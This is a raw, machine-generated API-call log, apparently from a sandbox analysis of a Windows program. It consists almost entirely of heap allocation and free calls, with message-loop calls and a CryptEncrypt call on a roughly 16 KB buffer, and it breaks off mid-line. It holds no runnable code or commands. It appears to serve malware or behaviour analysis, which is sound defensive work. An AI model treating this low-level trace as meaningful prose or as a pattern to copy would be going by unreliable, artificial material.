RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0223.780] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3f24, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3f28) returned 1 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0223.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0223.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0223.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0223.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0223.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0223.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0223.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0223.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0223.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0223.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0223.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0223.784] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0223.784] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0223.784] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0223.785] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0223.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0223.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0223.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0223.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0223.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0223.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0223.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0223.787] CharLowerBuffW (in: lpsz="byte[16168]", cchLength=0xb | out: lpsz="byte[16168]") returned 0xb [0223.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0223.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f28) returned 0x2f1c678 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0223.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0223.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0223.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0223.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0223.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0223.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0223.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0223.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0223.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0223.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x2f205a8 [0223.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0223.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x2f244d8 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f205a8 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f244d8 | out: hHeap=0x970000) returned 1 [0223.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0223.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: 